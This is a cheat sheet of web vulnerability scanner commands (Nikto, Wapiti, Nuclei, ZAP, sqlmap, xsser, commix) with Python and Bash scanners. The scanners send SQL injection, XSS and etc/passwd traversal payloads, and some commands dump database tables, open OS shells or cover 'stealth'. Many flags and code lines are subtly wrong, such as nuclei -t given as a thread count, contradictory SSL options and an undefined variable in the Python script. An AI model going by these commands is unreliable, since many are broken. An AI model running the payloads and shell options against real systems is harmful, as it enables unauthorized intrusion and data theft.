Vulnerability Scanner Tools

Comprehensive collection of web application vulnerability scanner tools and techniques for security testing.

Nikto

Basic Vulnerability Scanning

# Basic vulnerability scan
nikto -h http://TARGET_URL

# With HTTPS
nikto -h https://TARGET_URL

# With specific port
nikto -h http://TARGET_URL -p 8080

# With multiple hosts
nikto -h http://TARGET_URL1,http://TARGET_URL2

# With output file
nikto -h http://TARGET_URL -o results.txt

# With XML output
nikto -h http://TARGET_URL -Format xml -o results.xml

# With JSON output
nikto -h http://TARGET_URL -Format json -o results.json

# With verbose output
nikto -h http://TARGET_URL -v

# With silent output
nikto -h http://TARGET_URL -s

Advanced Nikto Options

# With specific plugins
nikto -h http://TARGET_URL -Plugins "apacheusers,backdoors"

# With all plugins
nikto -h http://TARGET_URL -Plugins all

# With exclude plugins
nikto -h http://TARGET_URL -Plugins "apacheusers,backdoors" -exclude "apacheusers"

# With custom user agent
nikto -h http://TARGET_URL -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# With cookies
nikto -h http://TARGET_URL -C "PHPSESSID=abc123"

# With authentication
nikto -h http://TARGET_URL -id admin:password

# With proxy
nikto -h http://TARGET_URL -useproxy http://127.0.0.1:8080

# With timeout
nikto -h http://TARGET_URL -timeout 10

# With retries
nikto -h http://TARGET_URL -retries 3

# With SSL options
nikto -h https://TARGET_URL -ssl -nossl

# With specific checks
nikto -h http://TARGET_URL -Tuning 1,2,3,4,5,6,7,8,9,0,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z

Wapiti

Basic Vulnerability Scanning

# Basic vulnerability scan
wapiti -u http://TARGET_URL

# With HTTPS
wapiti -u https://TARGET_URL

# With specific port
wapiti -u http://TARGET_URL:8080

# With output file
wapiti -u http://TARGET_URL -o results.txt

# With XML output
wapiti -u http://TARGET_URL -f xml -o results.xml

# With JSON output
wapiti -u http://TARGET_URL -f json -o results.json

# With verbose output
wapiti -u http://TARGET_URL -v

# With silent output
wapiti -u http://TARGET_URL -s

Advanced Wapiti Options

# With specific modules
wapiti -u http://TARGET_URL -m "sql,xss,file,exec,ssrf"

# With all modules
wapiti -u http://TARGET_URL -m all

# With exclude modules
wapiti -u http://TARGET_URL -m "sql,xss,file,exec,ssrf" -e "sql"

# With custom user agent
wapiti -u http://TARGET_URL -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# With cookies
wapiti -u http://TARGET_URL -c "PHPSESSID=abc123"

# With authentication
wapiti -u http://TARGET_URL -a admin:password

# With proxy
wapiti -u http://TARGET_URL -p http://127.0.0.1:8080

# With timeout
wapiti -u http://TARGET_URL -t 10

# With retries
wapiti -u http://TARGET_URL -r 3

# With SSL options
wapiti -u https://TARGET_URL -k

# With specific checks
wapiti -u http://TARGET_URL -c "PHPSESSID=abc123" -a "Mozilla/5.0"

Nuclei

Basic Vulnerability Scanning

# Basic vulnerability scan
nuclei -u http://TARGET_URL

# With HTTPS
nuclei -u https://TARGET_URL

# With specific port
nuclei -u http://TARGET_URL:8080

# With multiple targets
nuclei -l targets.txt

# With output file
nuclei -u http://TARGET_URL -o results.txt

# With JSON output
nuclei -u http://TARGET_URL -json -o results.json

# With verbose output
nuclei -u http://TARGET_URL -v

# With silent output
nuclei -u http://TARGET_URL -silent

Advanced Nuclei Options

# With specific templates
nuclei -u http://TARGET_URL -t templates/sql-injection.yaml

# With all templates
nuclei -u http://TARGET_URL -t templates/

# With exclude templates
nuclei -u http://TARGET_URL -t templates/ -exclude-templates templates/sql-injection.yaml

# With custom user agent
nuclei -u http://TARGET_URL -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# With cookies
nuclei -u http://TARGET_URL -H "Cookie: PHPSESSID=abc123"

# With authentication
nuclei -u http://TARGET_URL -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ="

# With proxy
nuclei -u http://TARGET_URL -proxy http://127.0.0.1:8080

# With timeout
nuclei -u http://TARGET_URL -timeout 10

# With retries
nuclei -u http://TARGET_URL -retries 3

# With SSL options
nuclei -u https://TARGET_URL -k

# With specific checks
nuclei -u http://TARGET_URL -t templates/sql-injection.yaml -t templates/xss.yaml

OWASP ZAP

Basic Vulnerability Scanning

# Basic vulnerability scan
zap-baseline.py -t http://TARGET_URL

# With HTTPS
zap-baseline.py -t https://TARGET_URL

# With specific port
zap-baseline.py -t http://TARGET_URL:8080

# With output file
zap-baseline.py -t http://TARGET_URL -r results.html

# With XML output
zap-baseline.py -t http://TARGET_URL -x results.xml

# With JSON output
zap-baseline.py -t http://TARGET_URL -J results.json

# With verbose output
zap-baseline.py -t http://TARGET_URL -v

# With silent output
zap-baseline.py -t http://TARGET_URL -s

Advanced OWASP ZAP Options

# With specific policies
zap-baseline.py -t http://TARGET_URL -P policy.xml

# With all policies
zap-baseline.py -t http://TARGET_URL -P all

# With exclude policies
zap-baseline.py -t http://TARGET_URL -P policy.xml -e "sql-injection,xss"

# With custom user agent
zap-baseline.py -t http://TARGET_URL -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# With cookies
zap-baseline.py -t http://TARGET_URL -c "PHPSESSID=abc123"

# With authentication
zap-baseline.py -t http://TARGET_URL -u admin:password

# With proxy
zap-baseline.py -t http://TARGET_URL -p http://127.0.0.1:8080

# With timeout
zap-baseline.py -t http://TARGET_URL -T 10

# With retries
zap-baseline.py -t http://TARGET_URL -R 3

# With SSL options
zap-baseline.py -t https://TARGET_URL -k

# With specific checks
zap-baseline.py -t http://TARGET_URL -P policy.xml -e "sql-injection,xss"

Custom Scripts

Python Vulnerability Scanner

import requests
import threading
import queue
import time
import re

def vulnerability_scanner(url, wordlist, threads=10, delay=0):
    def worker():
        while True:
            try:
                path = wordlist.get()
                if path is None:
                    break
                
                full_url = url.rstrip('/') + '/' + path.strip()
                
                # SQL Injection check
                sql_payloads = ["'", "\"", "';", "\";", "' OR 1=1--", "\" OR 1=1--"]
                for payload in sql_payloads:
                    test_url = full_url + "?id=" + payload
                    response = requests.get(test_url, timeout=5)
                    if "error" in response.text.lower() or "mysql" in response.text.lower():
                        print(f"[SQL Injection] {test_url}")
                
                # XSS check
                xss_payloads = ["<script>alert('XSS')</script>", "<img src=x onerror=alert('XSS')>"]
                for payload in xss_payloads:
                    test_url = full_url + "?search=" + payload
                    response = requests.get(test_url, timeout=5)
                    if payload in response.text:
                        print(f"[XSS] {test_url}")
                
                # Directory traversal check
                traversal_payloads = ["../", "..\\", "....//", "....\\\\"]
                for payload in traversal_payloads:
                    test_url = full_url + "?file=" + payload + "etc/passwd"
                    response = requests.get(test_url, timeout=5)
                    if "root:" in response.text:
                        print(f"[Directory Traversal] {test_url}")
                
                time.sleep(delay)
                
            except Exception as e:
                pass
            finally:
                wordlist.task_done()
    
    # Start threads
    for i in range(threads):
        t = threading.Thread(target=worker)
        t.daemon = True
        t.start()
    
    # Add paths to queue
    with open(wordlist_file, 'r') as f:
        for line in f:
            wordlist.put(line.strip())
    
    # Wait for completion
    wordlist.join()

# Usage
url = "http://TARGET_URL"
wordlist_file = "/usr/share/wordlists/dirb/common.txt"
wordlist = queue.Queue()
vulnerability_scanner(url, wordlist, threads=20, delay=0.1)

Bash Vulnerability Scanner

#!/bin/bash

TARGET_URL="http://TARGET_URL"
WORDLIST="/usr/share/wordlists/dirb/common.txt"
THREADS=10

# Function to check vulnerabilities
check_vulnerabilities() {
    local path=$1
    local full_url="${TARGET_URL}/${path}"
    
    # SQL Injection check
    sql_payloads=("'" "\"" "';" "\";" "' OR 1=1--" "\" OR 1=1--")
    for payload in "${sql_payloads[@]}"; do
        test_url="${full_url}?id=${payload}"
        response=$(curl -s "$test_url")
        if echo "$response" | grep -qi "error\|mysql"; then
            echo "[SQL Injection] $test_url"
        fi
    done
    
    # XSS check
    xss_payloads=("<script>alert('XSS')</script>" "<img src=x onerror=alert('XSS')>")
    for payload in "${xss_payloads[@]}"; do
        test_url="${full_url}?search=${payload}"
        response=$(curl -s "$test_url")
        if echo "$response" | grep -q "$payload"; then
            echo "[XSS] $test_url"
        fi
    done
    
    # Directory traversal check
    traversal_payloads=("../" "..\\" "....//" "....\\\\")
    for payload in "${traversal_payloads[@]}"; do
        test_url="${full_url}?file=${payload}etc/passwd"
        response=$(curl -s "$test_url")
        if echo "$response" | grep -q "root:"; then
            echo "[Directory Traversal] $test_url"
        fi
    done
}

# Export function for parallel
export -f check_vulnerabilities
export TARGET_URL

# Run parallel vulnerability check
cat "$WORDLIST" | parallel -j "$THREADS" check_vulnerabilities {}

Vulnerability Types

SQL Injection

# Basic SQL injection test
sqlmap -u "http://TARGET_URL/page.php?id=1"

# With POST data
sqlmap -u "http://TARGET_URL/login.php" --data="username=admin&password=admin"

# With cookies
sqlmap -u "http://TARGET_URL/page.php?id=1" --cookie="PHPSESSID=abc123"

# With headers
sqlmap -u "http://TARGET_URL/page.php?id=1" --headers="User-Agent: CustomAgent"

# With proxy
sqlmap -u "http://TARGET_URL/page.php?id=1" --proxy="http://127.0.0.1:8080"

# With authentication
sqlmap -u "http://TARGET_URL/page.php?id=1" --auth-type=basic --auth-cred="admin:password"

# With database enumeration
sqlmap -u "http://TARGET_URL/page.php?id=1" --dbs
sqlmap -u "http://TARGET_URL/page.php?id=1" --tables
sqlmap -u "http://TARGET_URL/page.php?id=1" --columns -T users
sqlmap -u "http://TARGET_URL/page.php?id=1" --dump -T users

# With OS shell
sqlmap -u "http://TARGET_URL/page.php?id=1" --os-shell

XSS (Cross-Site Scripting)

# Basic XSS test
xsser -u "http://TARGET_URL/page.php?search=test"

# With POST data
xsser -u "http://TARGET_URL/login.php" --data="username=admin&password=admin"

# With cookies
xsser -u "http://TARGET_URL/page.php?search=test" --cookie="PHPSESSID=abc123"

# With headers
xsser -u "http://TARGET_URL/page.php?search=test" --headers="User-Agent: CustomAgent"

# With proxy
xsser -u "http://TARGET_URL/page.php?search=test" --proxy="http://127.0.0.1:8080"

# With authentication
xsser -u "http://TARGET_URL/page.php?search=test" --auth="admin:password"

# With payloads
xsser -u "http://TARGET_URL/page.php?search=test" --payload="<script>alert('XSS')</script>"

# With encoding
xsser -u "http://TARGET_URL/page.php?search=test" --encode

Command Injection

# Basic command injection test
commix -u "http://TARGET_URL/page.php?cmd=test"

# With POST data
commix -u "http://TARGET_URL/login.php" --data="username=admin&password=admin"

# With cookies
commix -u "http://TARGET_URL/page.php?cmd=test" --cookie="PHPSESSID=abc123"

# With headers
commix -u "http://TARGET_URL/page.php?cmd=test" --headers="User-Agent: CustomAgent"

# With proxy
commix -u "http://TARGET_URL/page.php?cmd=test" --proxy="http://127.0.0.1:8080"

# With authentication
commix -u "http://TARGET_URL/page.php?cmd=test" --auth="admin:password"

# With OS shell
commix -u "http://TARGET_URL/page.php?cmd=test" --os-shell

Best Practices

Rate Limiting

# Add delay between requests
nikto -h http://TARGET_URL -timeout 10

# Use fewer threads
nuclei -u http://TARGET_URL -t 10

# Use proxy rotation
nuclei -u http://TARGET_URL -proxy http://proxy1:8080

Stealth Mode

# Use random user agents
nikto -h http://TARGET_URL -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Use realistic delays
nuclei -u http://TARGET_URL -rate-limit 50

# Use smaller wordlists
nuclei -u http://TARGET_URL -t templates/sql-injection.yaml

Output Analysis

# Save results to file
nikto -h http://TARGET_URL -o results.txt

# Filter by severity
grep "HIGH" results.txt
grep "MEDIUM" results.txt
grep "LOW" results.txt

# Sort by vulnerability type
grep "SQL Injection" results.txt
grep "XSS" results.txt
grep "Command Injection" results.txt

Troubleshooting

Common Issues

# Connection timeout
nikto -h http://TARGET_URL -timeout 30

# Too many requests
nuclei -u http://TARGET_URL -rate-limit 50

# Invalid SSL certificate
nuclei -u https://TARGET_URL -k

# Authentication required
nuclei -u http://TARGET_URL -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ="

Performance Optimization

# Use appropriate thread count
nuclei -u http://TARGET_URL -t 20

# Use smaller wordlists for initial scan
nuclei -u http://TARGET_URL -t templates/sql-injection.yaml

# Use specific templates
nuclei -u http://TARGET_URL -t templates/sql-injection.yaml -t templates/xss.yaml
  • Always obtain proper authorization before testing
  • Respect rate limits and server resources
  • Use appropriate tools for the target
  • Document findings properly
  • Follow responsible disclosure practices